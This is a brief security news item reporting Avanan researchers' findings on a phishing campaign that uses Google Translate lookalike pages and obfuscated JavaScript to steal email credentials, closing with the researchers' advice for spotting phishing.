Google Translate spoofed for credential harvesting.
N2K logoOct 13, 2022

Bogus Google Translate lookalike pages are being used in a credential theft campaign.

Google Translate spoofed for credential harvesting.

Researchers at Avanan describe phishing emails that are impersonating Google Translate in order to steal users’ email credentials. The emails inform users that they have pending incoming emails, and they’ll need to confirm their account within 48 hours in order to receive the emails. If the user clicks the link in the emails, they’ll be taken to a phony Google Translate page with a login field. 

“In the background, you can see the HTML that goes into turning this site into a Google Translate lookalike,” the researchers state. “One of the JavaScript commands they use is the unescape function. This is a classic command that helps obfuscate the true meaning of the page. Further, when decoding the JavaScript, you’ll see that the security service would see a bunch of gibberish.”

The phishing page looks fairly convincing, but users should note that the phishing page’s URL looks very suspicious, even though it ends with “translate[.]goog.”

Avanan offers the following advice to help users avoid falling for phishing scams:

  • “Always hover over URLs to ensure the destination is legitimate
  • “Be sure to pay attention to grammar, spelling and factual inconsistencies within an email
  • “If ever unsure about an email, ask the original sender”